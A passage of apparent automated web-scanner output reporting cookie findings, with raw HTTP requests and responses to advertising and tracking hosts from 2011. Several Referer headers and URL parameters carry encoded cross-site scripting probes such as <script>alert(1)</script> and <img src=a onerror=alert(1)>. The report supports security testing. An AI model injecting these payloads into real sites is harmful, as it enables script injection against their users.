rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-36820622_1296770406,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23661 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-92324644_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beacons?callback=jsonp1296766389465 HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cookie?pageUrl=http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22&isTop=true&callback=1 HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06"
Response
HTTP/1.1 404 Not Found Cache-Control: must-revalidate,no-cache,no-store Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+17%3A50%3A36";Path=/;Domain=.adap.tv;Expires=Mon, 13-Oct-42 03:37:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 1376 Server: Jetty(6.1.22)
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /select/Login HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/adStreamJSController.xml?a=getadscheduleforcontent&format=vast&fetchads=overlay&ss_partnerId=626&ss_height=360&ss_width=480&asVersion=3&jsa=Y&blacklist=&ss_mediaCategories=&ss_mediaDescription=&ss_mediaId=v18978294NGnK88j8&ss_mediaKeywords=&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; behavioralSegments=29_110203|32_110203|263_110203
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p59844736&PRAd=60056&AR_C=656 HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Thu, 03 Feb 2011 22:03:49 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: ar_p59844736=exp=1&initExp=Thu Feb 3 22:03:49 2011&recExp=Thu Feb 3 22:03:49 2011&prad=60056&arc=656&; expires=Wed 04-May-2011 22:03:49 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296770629; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u/getuid/?nocache=0%2E6689167399890721&a=715b8c3a075d11dea9710019b9f1584b HTTP/1.1 Host: audience.visiblemeasures.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:08:03 GMT P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV" Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 21:08:03 GMT Set-Cookie: sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 21:38:03 GMT Content-Type: text/plain Content-Length: 89 Server: Jetty(7.x.y-SNAPSHOT)
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u/getuid/ HTTP/1.1 Host: audience.visiblemeasures.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056; sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:50 GMT P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV" Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 22:03:50 GMT Set-Cookie: sid=C5F474F2682AA8DAE8075A6889492B4928B445B7;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 22:33:50 GMT Content-Type: text/plain Content-Length: 89 Server: Jetty(7.x.y-SNAPSHOT) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=8&c2=6036036&rn=439947884&c7=http%3A%2F%2Fcore.videoegg.com%2Feap%2F12368%2Fhtml%2Fjstags.html%3FCCID%3D0%26r%3D0.3821160274092108&c3=1&c9=http%3A%2F%2Fwww.tucows.com%2Fvideoegg%2Fad.html&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Thu, 03 Feb 2011 20:51:19 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 20:51:19 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035784&c3=0&c4=2331.7717.9237.23663&c5=4871&c6=f978e9b0-271c-47b8-9a97-caba692f0bb2&c10=11073.35211.76599&c15=&cj=1&rn=5575236558291927040 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Thu, 03 Feb 2011 21:59:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 21:59:56 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogsearch.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:04 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=f09ac1e2ccf2b58a:TM=1296765124:LM=1296765124:S=VHIb6cqmET3q7qwK; expires=Sat, 02-Feb-2013 20:32:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:31:57 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=6552b75bb12891c4:TM=1296765117:LM=1296765117:S=z2Yh1vRAeMtxN6LI; expires=Sat, 02-Feb-2013 20:31:57 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pixid=99004680 HTTP/1.1 Host: bp.specificclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adp=7CUZ^0^8191; smdmp=7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=7CUZ^0^0; ug=uosDj9Liw_xRTA
Response
